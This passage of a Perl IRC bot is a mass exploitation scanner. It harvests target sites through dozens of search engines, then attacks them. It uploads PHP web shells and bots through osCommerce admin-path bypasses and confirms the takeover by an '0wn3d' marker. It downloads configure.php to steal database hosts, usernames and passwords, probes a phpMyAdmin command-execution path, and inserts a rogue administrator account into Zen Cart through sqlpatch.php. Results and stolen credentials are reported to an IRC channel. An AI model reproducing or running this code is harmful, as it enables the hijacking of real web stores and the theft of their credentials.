  1714.             $count++;
  1715.          if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$cpanlogo 12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4== "); } }
  1716.             my $test = "http://".$site.$bug;
  1717.                         my $zine = "http://".$site."admin/content.php?module=user";
  1718.             my $re    = &get_content($zine);
  1719.            if ($re =~ /<input type=submit value='Tambah User'>/){
  1720.                         &msg("$chan","$cpanlogo 12(4@0$engine12)(4@8OK4]9 http://".$site."4admin/content.php?act=tambahuser");sleep(2);
  1721.             }
  1722.                 }
  1723.     }
  1724. }
  1725.  
  1726. ######################## PHPmyadmin
  1727. sub adm() {
  1728.         my ($chan,$bug,$dork,$engine) = @_;
  1729.     my $count = 0;
  1730.     my @list = &search_engine($chan,$bug,$dork,$engine,$admlogo);
  1731.     my $num = scalar(@list);
  1732.     if ($num > 0) {
  1733.         foreach my $site (@list) {
  1734.             $count++;
  1735.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$admlogo 12(4@0$engine12) 11==14F11=15I11=0N11=0I11=15S11=14H11== "); } }
  1736.             my $test  = "http://".$site."phpMyAdmin/config/config.inc.php?c=id";
  1737.             my $vuln = "http://".$site."phpMyAdmin/config/config.inc.php?c=4[cmd]s";
  1738.             my $re   = &get_content($test);
  1739.             if ($re =~ /$adm_output/){
  1740.             &msg("$chan", "$admlogo 12(4@0$engine12)(4@12VulN15)12 ".$vuln."15(4@0OKE15)");
  1741.             }
  1742.          }
  1743.     }
  1744. }
  1745.  
  1746. ######################## OSCO
  1747. sub osco() {
  1748.         my ($chan,$bug,$dork,$engine) = @_;
  1749.     my $count = 0;
  1750.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1751.     my $num = scalar(@list);
  1752.     if ($num > 0) {
  1753.         foreach my $site (@list) {
  1754.             $count++;
  1755.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  1756.             my $test = "http://".$site.$bug;
  1757.                         my $test1 = "http://".$site."admin/file_manager.php/login.php";
  1758.             my $test2 = "http://".$site."admin/banner_manager.php/login.php";
  1759.                         my $test3 = "http://".$site."admin/categories.php/login.php?cPath=&action=new_product_preview";
  1760.             my $html = &get_content($test);
  1761.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1762.             if ($html =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/ ) {
  1763.                         if ($conf{soscos} == 1) {
  1764.                                 &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test);
  1765.                         }
  1766.                                 &osco_xpl1($test,$chan,$site,$engine);
  1767.                                 &osco_xpl2($test1,$chan,$site,$engine);
  1768.                                 &osco_xpl3($test2,$chan,$site,$engine);
  1769.                                 &osco_xpl4($test3,$chan,$site,$engine);
  1770.                                 &osql($chan,$site,$engine);
  1771.                                 } else { }
  1772.             } exit; sleep(2); }
  1773.         }
  1774.     }
  1775. }
  1776.  
  1777. sub osco_xpl1() {
  1778. my $browser = LWP::UserAgent->new;
  1779. my $url    = $_[0]."?cPath=&action=new_product_preview";
  1780. my $chan   = $_[1];
  1781. my $site   = $_[2];
  1782. my $engine = $_[3];
  1783. my $res = $browser->post( $url,['products_image' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1784. my $resa = $browser->post( $url,['products_image' => ['./pbot.jpg' => 'pb.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1785. my $resb = $browser->post( $url,['products_image' => ['./sl.jpg' => 'SQL_Manager.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1786. my $resc = $browser->post( $url,['products_image' => ['./sh.jpg' => '../h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1787. my $resd = $browser->post( $url,['products_image' => ['./sh.jpg' => '../includes/h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1788.         my $hasil = $res->as_string;
  1789.         my $hasil1 = $resa->as_string;
  1790.         my $hasil2 = $resb->as_string;
  1791.         my $hasil3 = $resc->as_string;
  1792.         my $hasil4 = $resd->as_string;
  1793.         sleep(5);
  1794.         &osco_shell_check($url,$chan,$site,$engine);
  1795. }
  1796.  
  1797. sub osco2() {
  1798.         my ($chan,$bug,$dork,$engine) = @_;
  1799.     my $count = 0;
  1800.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1801.     my $num = scalar(@list);
  1802.     if ($num > 0) {
  1803.         foreach my $site (@list) {
  1804.             $count++;
  1805.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  1806.             my $test = "http://".$site.$bug;
  1807.             my $test1 = "http://".$site."admin/banner_manager.php/login.php";
  1808.                         my $test2 = "http://".$site."admin/categories.php/login.php?cPath=&action=new_product_preview";
  1809.                         my $test3 = "http://".$site."admin/categories.php/login.php";
  1810.             my $html = &get_content($test);
  1811.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1812.             if ($html =~ /TABLE_HEADING_FILENAME/) {
  1813.                         if ($conf{soscos} == 1) {
  1814.                 &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test);
  1815.                         }
  1816.                                 &osco_xpl2($test,$chan,$site,$engine);
  1817.                                 &osco_xpl3($test1,$chan,$site,$engine);
  1818.                                 &osco_xpl4($test2,$chan,$site,$engine);
  1819.                                 &osco_xpl1($test3,$chan,$site,$engine);
  1820.                 &osql($chan,$site,$engine);
  1821.                                 } else { }
  1822.             } exit; sleep(2); }
  1823.         }
  1824.     }
  1825. }
  1826.  
  1827. sub osco_xpl2() {
  1828. my $browser = LWP::UserAgent->new;
  1829. my $url    = $_[0]."?action=processuploads";
  1830. my $chan   = $_[1];
  1831. my $site   = $_[2];
  1832. my $engine = $_[3];
  1833. my $res = $browser->post( $url,['file_1' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1834. my $resa = $browser->post( $url,['file_1' => ['./pbot.jpg' => 'pb.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1835. my $resb = $browser->post( $url,['file_1' => ['./sl.jpg' => 'SQL_Manager.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1836. my $resc = $browser->post( $url,['file_1' => ['./sh.jpg' => '../h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1837. my $resd = $browser->post( $url,['file_1' => ['./sh.jpg' => '../includes/h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1838.         my $hasil = $res->as_string;
  1839.         my $hasil1 = $resa->as_string;
  1840.         my $hasil2 = $resb->as_string;
  1841.         my $hasil3 = $resc->as_string;
  1842.         my $hasil4 = $resd->as_string;
  1843.         sleep(5);
  1844.         &osco_shell_check($url,$chan,$site,$engine);
  1845. }
  1846.  
  1847. sub osco3() {
  1848.         my ($chan,$bug,$dork,$engine) = @_;
  1849.     my $count = 0;
  1850.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1851.     my $num = scalar(@list);
  1852.     if ($num > 0) {
  1853.         foreach my $site (@list) {
  1854.             $count++;
  1855.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  1856.             my $test = "http://".$site.$bug;
  1857.                         my $test1 = "http://".$site."admin/categories.php/login.php?cPath=&action=new_product_preview";
  1858.                         my $test2 = "http://".$site."admin/categories.php/login.php";
  1859.                         my $test3 = "http://".$site."admin/file_manager.php/login.php";
  1860.             my $html = &get_content($test);
  1861.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1862.             if ($html =~ /TABLE_HEADING_BANNERS/) {
  1863.                         if ($conf{soscos} == 1) {
  1864.                 &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test);
  1865.                         }
  1866.                                 &osco_xpl3($test,$chan,$site,$engine);
  1867.                                 &osco_xpl4($test1,$chan,$site,$engine);
  1868.                                 &osco_xpl1($test2,$chan,$site,$engine);
  1869.                                 &osco_xpl2($test3,$chan,$site,$engine);
  1870.                 &osql($chan,$site,$engine);
  1871.                                 } else { }
  1872.             } exit; sleep(2); }
  1873.                 }
  1874.     }
  1875. }
  1876.  
  1877. sub osco_xpl3() {
  1878. my $browser = LWP::UserAgent->new;
  1879. my $url    = $_[0]."?action=insert";
  1880. my $chan   = $_[1];
  1881. my $site   = $_[2];
  1882. my $engine = $_[3];
  1883. my $res = $browser->post( $url,['banners_image' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1884. my $resa = $browser->post( $url,['banners_image' => ['./pbot.jpg' => 'pb.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1885. my $resb = $browser->post( $url,['banners_image' => ['./sl.jpg' => 'SQL_Manager.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1886. my $resc = $browser->post( $url,['banners_image' => ['./sh.jpg' => '../h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1887. my $resd = $browser->post( $url,['banners_image' => ['./sh.jpg' => '../includes/h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1888.         my $hasil = $res->as_string;
  1889.         my $hasil1 = $resa->as_string;
  1890.         my $hasil2 = $resb->as_string;
  1891.         my $hasil3 = $resc->as_string;
  1892.         my $hasil4 = $resd->as_string;
  1893.         sleep(5);
  1894.         &osco_shell_check($url,$chan,$site,$engine);
  1895. }
  1896.  
  1897.  
  1898. sub osco4() {
  1899.         my ($chan,$bug,$dork,$engine) = @_;
  1900.     my $count = 0;
  1901.     my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1902.     my $num = scalar(@list);
  1903.     if ($num > 0) {
  1904.         foreach my $site (@list) {
  1905.             $count++;
  1906.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oscologo12(4@0$engine12) 4==14F4=15I4=0N4=0I4=15S4=14H4=="); } }
  1907.             my $test = "http://".$site.$bug;
  1908.                         my $test1 = "http://".$site."admin/categories.php/login.php";
  1909.                         my $test2 = "http://".$site."admin/file_manager.php/login.php";
  1910.                         my $test3 = "http://".$site."admin/banner_manager.php/login.php";
  1911.             my $html = &get_content($test);
  1912.                         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1913.             if ($html =~ /Warning: No file uploaded/ ) {
  1914.                         if ($conf{soscos} == 1) {
  1915.                 &msg("$chan","$oscologo12(4@0$engine12)(4@7SYSTEM12)11 ".$test);
  1916.                         }
  1917.                                 &osco_xpl4($test,$chan,$site,$engine);
  1918.                                 &osco_xpl1($test1,$chan,$site,$engine);
  1919.                                 &osco_xpl2($test2,$chan,$site,$engine);
  1920.                                 &osco_xpl3($test3,$chan,$site,$engine);
  1921.                                 } else { }
  1922.             } exit; sleep(2); }
  1923.         }
  1924.     }
  1925. }
  1926. sub osco_xpl4() {
  1927. my $browser = LWP::UserAgent->new;
  1928. my $url    = $_[0];
  1929. my $chan   = $_[1];
  1930. my $site   = $_[2];
  1931. my $engine = $_[3];
  1932. my $res  = $browser->post( $url,['products_image' => ['./sh.jpg' => 'h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1933. my $resa = $browser->post( $url,['products_image' => ['./pbot.jpg' => 'pb.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1934. my $resb = $browser->post( $url,['products_image' => ['./sl.jpg' => 'SQL_Manager.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1935. my $resc  = $browser->post( $url,['products_image' => ['./sh.jpg' => '../h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1936. my $resd  = $browser->post( $url,['products_image' => ['./sh.jpg' => '../includes/h4rd.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1937.     my $hasil = $res->as_string;
  1938.         my $hasil1 = $resa->as_string;
  1939.         my $hasil2 = $resb->as_string;
  1940.         my $hasil3 = $resc->as_string;
  1941.         my $hasil4 = $resd->as_string;
  1942.         sleep(5);
  1943.         &osco_shell_check($url,$chan,$site,$engine);
  1944. }
  1945.  
  1946.  
  1947. sub osco_shell_check() {
  1948. my $url    = $_[0];
  1949. my $chan   = $_[1];
  1950. my $site   = $_[2];
  1951. my $engine = $_[3];
  1952. my $check0 = &get_content("http://".$site."images/h4rd.php");
  1953. my $check1 = &get_content("http://".$site."admin/h4rd.php");
  1954. my $check2 = &get_content("http://".$site."h4rd.php");
  1955. my $check3 = &get_content("http://".$site."includes/h4rd.php");
  1956. $urli0 = "http://".$site."images/h4rd.php";
  1957. $urli1 = "http://".$site."admin/h4rd.php";
  1958. $urli2 = "http://".$site."h4rd.php";
  1959. $urli3 = "http://".$site."includes/h4rd.php";
  1960.  
  1961.     if ($check0 =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  1962.         &info_main($urli0,$chan,$engine,$oscologo);
  1963.         }
  1964.         &get_content("http://".$site."images/pb.php");
  1965.         &get_content("http://".$site."images/SQL_Manager.php");
  1966.         sleep(2);
  1967.                 if ($check1 =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  1968.                 &info_main($urli1,$chan,$engine,$oscologo);
  1969.                 }
  1970.                 &get_content("http://".$site."admin/pb.php");
  1971.                 &get_content("http://".$site."admin/SQL_Manager.php");
  1972.                 sleep(2);
  1973.                         if ($check2 =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  1974.                         &info_main($urli2,$chan,$engine,$oscologo);
  1975.                         }
  1976.                         &get_content("http://".$site."pb.php");
  1977.                         &get_content("http://".$site."SQL_Manager.php");
  1978.                         sleep(2);
  1979.                                 if ($check3 =~ /<font face='verdana' size='2'><b>ID:<\/b> 0wn3d<\/font><br>/ ) {
  1980.                                 &info_main($urli3,$chan,$engine,$oscologo);
  1981.                                 }
  1982. }
  1983.  
  1984. sub osql() {
  1985.     my $chan   = $_[0];
  1986.     my $site   = $_[1];
  1987.     my $engine = $_[2];
  1988.       my $test = "http://".$site."admin/file_manager.php/login.php?action=download&filename=/includes/configure.php";
  1989.       my $re   = &get_content($test);
  1990.          if ($re =~ /http:\/\//){
  1991.             &osql_xpl($test,$chan,$engine,$site);
  1992.         }
  1993.  }
  1994.  
  1995. sub osql_xpl() {
  1996.      my $url    = $_[0];
  1997.      my $chan   = $_[1];
  1998.          my $engine = $_[2];
  1999.      my $site   = $_[3];
  2000.      my $request   = HTTP::Request->new(GET=>$url);
  2001.      my $browser   = LWP::UserAgent->new();
  2002.         $browser->timeout(17);
  2003.         my $response  = $browser->request($request);
  2004.          if ($response->is_success) {
  2005.                         my $dbinfo = "";
  2006.                         my $res   = $response->as_string;
  2007.                           if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
  2008.                                 $dbinfo = $dbinfo."14[+]pth:4 $1 ";
  2009.                             $odbi[0] = "1";
  2010.                           }
  2011.                           if ($res =~ m/'DB_SERVER', '(.*)'/g) {
  2012.                           if ($1 eq "localhost") { $clr = "4 "; }
  2013.                           elsif ($1 eq "localhost:3306") { $clr = "4 "; }
  2014.                           elsif ($1 eq "127.0.0.1") { $clr = "4 "; }
  2015.                           else { $clr = "12 "; }
  2016.                                 $dbinfo = $dbinfo."14[+]srv:".$clr.$1." ";
  2017.                                 $odbi[1] = "1";
  2018.                           }
  2019.                           if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
  2020.                                 $dbinfo = $dbinfo."14[+]usr:4 $1 ";
  2021.                                 $odbi[2] = "1";
  2022.                           }
  2023.                           if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
  2024.                                 $dbinfo = $dbinfo."14[+]pwd:4 $1 ";
  2025.                                 $odbi[3] = "1";
  2026.                           }
  2027.                           if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
  2028.                                 $dbinfo = $dbinfo."14[+]db:4 $1 ";
  2029.                                 $odbi[4] = "1";
  2030.                           }
  2031.                                 if ($odbi[0] == "1" && $odbi[1] == "1" && $odbi[2] == "1" && $odbi[3] == "1" && $odbi[4] == "1") {
  2032.                                         &msg("$chan","$ossqllogo12(4@0$engine12)12(4@3VULN12)4 http://".$site." ".$dbinfo." ");
  2033.                                 }      
  2034.                  }
  2035. }
  2036.  
  2037. ######################## OpenCart
  2038. sub op() {
  2039.         my ($chan,$bug,$dork,$engine) = @_;
  2040.     my $count = 0;
  2041.     my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
  2042.     my $num = scalar(@list);
  2043.     if ($num > 0) {
  2044.         foreach my $site (@list) {
  2045.             $count++;
  2046.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$oplogo(4@5$engine15)12 Scan finish"); } }
  2047.             my $test  = "http://".$site.$open_test;
  2048.             my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  2049.             my $re   = &get_content($test);
  2050.             if ($re =~ /$open_output/){
  2051.             &msg("$chan", "$oplogo(4@5$engine15)(4@12VulN15)13 ".$vuln."15(4@UPLOAD15)");
  2052.             }
  2053.         }
  2054.     }
  2055. }
  2056.  
  2057. ######################## ZEN
  2058. sub zen() {
  2059.     my ($chan,$bug,$dork,$engine) = @_;
  2060.     my $count = 0;
  2061.     my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  2062.     my $num = scalar(@list);
  2063.     if ($num > 0) {
  2064.         foreach my $site (@list) {
  2065.             $count++;
  2066.             if ($count == $num-1) { if ($conf{ssdone} == 1) { &msg("$chan","$zenlogo12(4@0$engine12)10 Scan finish"); } }
  2067.             my $test  = "http://".$site."admin/sqlpatch.php/password_forgotten.php?action=execute";
  2068.             my $html  = &get_content($test);
  2069.                if ($html =~ /zc_install/){
  2070.                    &zen_query($chan,$site,$test,$engine);
  2071.                    }
  2072.                }
  2073.           }
  2074.      }
  2075. sub zen_query() {
  2076.     my $chan = $_[0];
  2077.     my $url = $_[1];
  2078.     my $test = $_[2];
  2079.         my $engine = $_[3];
  2080.     my $code  = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (773,'Ha45K','Ha45K@hotmail.com','617ec22fbb8f201c366e9848c0eb6925:87');";
  2081.     my $req = HTTP::Request->new(POST => $test);
  2082.     $req->content_type("application/x-www-form-urlencoded");
  2083.     $req->content("query_string=".$code);
  2084.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2085.     $ua->timeout(3);
  2086.     my $res = $ua->request($req);
  2087.     my $data = $res->as_string;
  2088.    if ( $data =~ /1 statements processed/i ) {
  2089.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9VulN15)3 http://".$url."4admin/login.php 15(4@9user15)0 Ha45K 15(4@9pass15)0 wew");
  2090.    }
  2091.    elsif ( $data =~ /Duplicate entry/ ) {
  2092.    &msg("$chan","$zenlogo12(4@0$engine12)(4@9SuCcEs15)12 http://".$url."3admin/login.php 15(4@9user15)10 Ha45K 15(4@9pass15)10 wew");
  2093.    }
  2094. }
  2095.  
  2096. #########################################
  2097. sub search_engine() {
  2098.     my (@total,@clean);
  2099.         my ($chan,$bug,$dork,$engine,$logo) = @_;
  2100.     if ($engine eq "Google") { my @google = &google($dork); push(@total,@google); }                                     # 1
  2101.     if ($engine eq "Google2") { my @google2 = &google2($dork); push(@total,@google2); }                                 # 2
  2102.         if ($engine eq "GigaBlast") { my @gigablast = &gigablast($dork); push(@total,@gigablast); }                     # 3
  2103.         if ($engine eq "EuroSeek") { my @euroseek = &euroseek($dork); push(@total,@euroseek); }                         # 4
  2104.         if ($engine eq "Alltheweb") { my @alltheweb = &alltheweb($dork); push(@total,@alltheweb); }                     # 5
  2105.     if ($engine eq "Rediff") { my @rediff = &rediff($dork); push(@total,@rediff); }                                     # 6
  2106.         if ($engine eq "Mamma") { my @mamma = &mamma($dork); push(@total,@mamma); }                                     # 7
  2107.     if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }                                             # 8
  2108.     if ($engine eq "Altavista") { my @altavista = &altavista($dork); push(@total,@altavista); }                         # 9
  2109.     if ($engine eq "Yahoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }                                         # 10
  2110.         if ($engine eq "Yahoo2") { my @yahoo2 = &yahoo2($dork); push(@total,@yahoo2); }                                 # 11
  2111.     if ($engine eq "Ask") { my @ask = &ask($dork); push(@total,@ask); }                                                 # 12
  2112.     if ($engine eq "Uol") { my @uol = &uol($dork); push(@total,@uol); }                                                 # 13
  2113.     if ($engine eq "Clusty") { my @clusty = &clusty($dork); push(@total,@clusty); }                                     # 14
  2114.     if ($engine eq "Gutser") { my @gutser = &gutser($dork); push(@total,@gutser); }                                     # 15
  2115.     if ($engine eq "Exalead") { my @exalead = &exalead($dork); push(@total,@exalead); }                                 # 16
  2116.     if ($engine eq "Lycos") { my @lycos = &lycos($dork); push(@total,@lycos); }                                         # 17
  2117.     if ($engine eq "Virgilio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }                             # 18
  2118.     if ($engine eq "Webde") { my @webde = &webde($dork); push(@total,@webde); }                                         # 19
  2119.     if ($engine eq "Hotbot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }                                     # 20
  2120.     if ($engine eq "Aol") { my @aol = &aol($dork); push(@total,@aol); }                                                 # 21
  2121.     if ($engine eq "Sapo") { my @sapo = &sapo($dork); push(@total,@sapo); }                                             # 22
  2122.     if ($engine eq "Duck") { my @duck = &duck($dork); push(@total,@duck); }                                             # 23
  2123.     if ($engine eq "Yause") { my @yause = &yause($dork); push(@total,@yause); }                                         # 24
  2124.     if ($engine eq "Baidu") { my @baidu = &baidu($dork); push(@total,@baidu); }                                         # 25
  2125.     if ($engine eq "Black") { my @black = &black($dork); push(@total,@black); }                                         # 26
  2126.     if ($engine eq "Onet") { my @onet = &onet($dork); push(@total,@onet); }                                             # 27
  2127.     if ($engine eq "Sizuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }                                     # 28
  2128.     if ($engine eq "Walla") { my @walla = &walla($dork); push(@total,@walla); }                                         # 29
  2129.     if ($engine eq "Demos") { my @demos = &demos($dork); push(@total,@demos); }                                         # 30
  2130.     if ($engine eq "Rose") { my @rose = &rose($dork); push(@total,@rose); }                                             # 31
  2131.     if ($engine eq "Seznam") { my @seznam = &seznam($dork); push(@total,@seznam); }                                     # 32
  2132.     if ($engine eq "Tiscali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }                                 # 33
  2133.     if ($engine eq "Naver") { my @naver = &naver($dork); push(@total,@naver); }                                         # 34
  2134.         if ($engine eq "AmiDalLa") { my @amidalla = &amidalla($dork); push(@total,@amidalla); }                         # 35
  2135.         if ($engine eq "BusCaR") { my @buscar = &buscar($dork); push(@total,@buscar); }                                 # 36
  2136.         if ($engine eq "KvaSiR") { my @kvasir = &kvasir($dork); push(@total,@kvasir); }                                 # 37
  2137.         if ($engine eq "eXciTe") { my @excite = &excite($dork); push(@total,@excite); }                                 # 38
  2138.         if ($engine eq "InteRia") { my @interia = &interia($dork); push(@total,@interia); }                             # 39
  2139.         if ($engine eq "SnZ") { my @snz = &snz($dork); push(@total,@snz); }                                             # 40
  2140.         if ($engine eq "RambLer") { my @rambler = &rambler($dork); push(@total,@rambler); }                             # 41
  2141.         if ($engine eq "YaNdeX") { my @yandex = &yandex($dork); push(@total,@yandex); }                                 # 42
  2142.         ###### nieuwe ######                   
  2143.         if ($engine eq "NetSprint") { my @netsprint = &netsprint($dork); push(@total,@netsprint); }                     # 43
  2144.         if ($engine eq "sAol") { my @saol = &saol($dork); push(@total,@saol); }                                         # 44
  2145.     if ($engine eq "Lookle") { my @lookle = &lookle($dork); push(@total,@lookle); }                                     # 45
  2146.     if ($engine eq "optusZoo") { my @optuszoo = &optuszoo($dork); push(@total,@optuszoo); }                             # 46
  2147.         if ($engine eq "Search66") { my @search66 = &search66($dork); push(@total,@search66); }                         # 47
  2148.         if ($engine eq "Arrama") { my @arrama = &arrama($dork); push(@total,@arrama); }                                 # 48
  2149.         if ($engine eq "eXciteJP") { my @excitejp = &excitejp($dork); push(@total,@excitejp); }                         # 49
  2150.     if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@biglobe); }                         # 50
  2151.         if ($engine eq "Clix") { my @clix = &clix($dork); push(@total,@clix); }                                         # 51
  2152.         if ($engine eq "SearchCH") { my @searchch = &searchch($dork); push(@total,@searchch); }                         # 52
  2153.         if ($engine eq "Cada") { my @cada = &cada($dork); push(@total,@cada); }                                         # 53
  2154.         ####################
  2155.         @clean = &clean(@total);
  2156.         if ($conf{ssfind} == 1) {
  2157.                 &msg("$chan","$logo12(4@0$engine12)8 ".scalar(@total)." 14-14´15§14ª14-13 ".scalar(@clean)." ");
  2158.         }
  2159.         return @clean;
  2160. }
  2161.  
  2162. #########################################
  2163.  
  2164. sub isFound() {
  2165.     my $status = 0;
  2166.     my $link = $_[0];
  2167.     my $reqexp = $_[1];
  2168.     my $res = &get_content($link);
  2169.     if ($res =~ /$reqexp/) { $status = 1 }
  2170.     return $status;
  2171. }
  2172.  
  2173. sub get_content() {
  2174.     my $url = $_[0];
  2175.     my $ua = LWP::UserAgent->new(agent => $uagent);
  2176.     $ua->timeout(7);
  2177.     my $req = HTTP::Request->new(GET => $url);
  2178.     my $res = $ua->request($req);
  2179.     return $res->content;
  2180. }
  2181.  
  2182. ######################################### SEARCH ENGINE
  2183. sub google() {
  2184.     my @list;
  2185.     my $key = $_[0];
  2186.     for (my $i=1; $i<=1000; $i+=100){
  2187.         my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
  2188.         my $res = &search_engine_query($search);
  2189.         while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  2190.             if ($1 !~ /google/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2191.             }
  2192.         }
  2193.     }
  2194.     return @list;
  2195. }
  2196. ############### GOED
  2197. sub google2() {
  2198.   my @list;
  2199.   my $key = $_[0];
  2200.   my $b   = 0;
  2201.   my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
  2202.   foreach my $domain (@doms) { #$dom = $doms[rand(scalar(@doms))];
  2203.     for (my $i=1; $i<=1000; $i+=100) {
  2204.         my $search = ("http://www.google.".$domain."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
  2205.         my $res = &search_engine_query($search);
  2206.         while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  2207.             if ($1 !~ /google/){ my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2208.             }
  2209.         }
  2210.     } return @list;
  2211. }
  2212. }
  2213. #### -
  2214. sub gigablast(){
  2215.     my @list;
  2216.         my $key = $_[0];
  2217.     my $b   = 0;
  2218.         for ($b=1; $b<=1000; $b+=100) {
  2219.         my $search = ("http://www.gigablast.com/search?q=".&key($key)."&n=".$b."");
  2220.         my $res = &search_engine_query($search);
  2221.         while ($res =~ m/http:\/\/(.+?)\//g) {
  2222.             my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2223.         }
  2224.     }
  2225.     return @list;
  2226. }
  2227. #### ?
  2228. sub euroseek() {
  2229.         my @list;
  2230.         my $key = $_[0];
  2231.         for ($b=1; $b<=1000; $b+=100) {
  2232.                 my $search = "http://euroseek.com/system/search.cgi?mode=internet&start=".$b."&string=".&key($key)."";
  2233.                 my $link = &search_engine_query($search);
  2234.                 while ( $link =~ m/http:\/\/(.+?)\//g) {
  2235.                         my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = links($link); push(@list,@grep);
  2236.                 }
  2237.         }
  2238.   return @list;
  2239. }
  2240. #### -
  2241. sub alltheweb() {
  2242.   my @list;
  2243.   my $key = $_[0];
  2244.     for ($i = 0;$i <= 1000;$i += 100) {
  2245.         my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=500&q=".key($key)."&o=".$i."");
  2246.         my $res = &search_engine_query($search);
  2247.                 while ($res =~ m/http:\/\/(.+?)\//g) {
  2248.             my $link = $1; $link =~ s/<//g; $link =~ s/ //g; my @grep = &links($link); push(@list,@grep);
  2249.         }
  2250.      }
  2251.      return @list;
  2252. }
  2253. ############### GOED
  2254. sub rediff() {
  2255.     my @list;
  2256.     my $key = $_[0];
  2257.     for (my $i=0; $i<=1000; $i+=100) {
